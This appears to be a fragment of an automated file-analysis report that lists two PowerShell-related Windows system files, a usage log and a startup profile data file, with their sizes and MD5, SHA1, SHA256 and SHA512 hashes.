C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize3KB
MD5573d77d4e77a445f5db769812a0be865
SHA17473d15ef2d3c6894edefd472f411c8e3209a99c
SHA2565ec3f268845a50e309ae0d80bcee4f4dd4cd1b279ab1e64b523a057c11074f1c
SHA512af2422a9790a91cdcbe39e6ef6d17899c2cbd4159b1b71ac56f633015068d3afc678fcef34892575bf59bdf7d5914ec6070864940d44130263fe84e28abba2dc
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize1KB
MD5631f4b3792b263fdda6b265e93be4747
SHA11d6916097d419198bfdf78530d59d0d9f3e12d45
SHA2564e68d2d067c5680a2e55853ac58b16f199b09f1b9e5f2174605fff18da828976
SHA512e0280041c4ca63971ab2524f25d2047820f031c1b4aeb6021a3367297045ddf6616ffccafb54630eb07fd154571d844329ebcc34d6ce64834cb77cba373e4fbe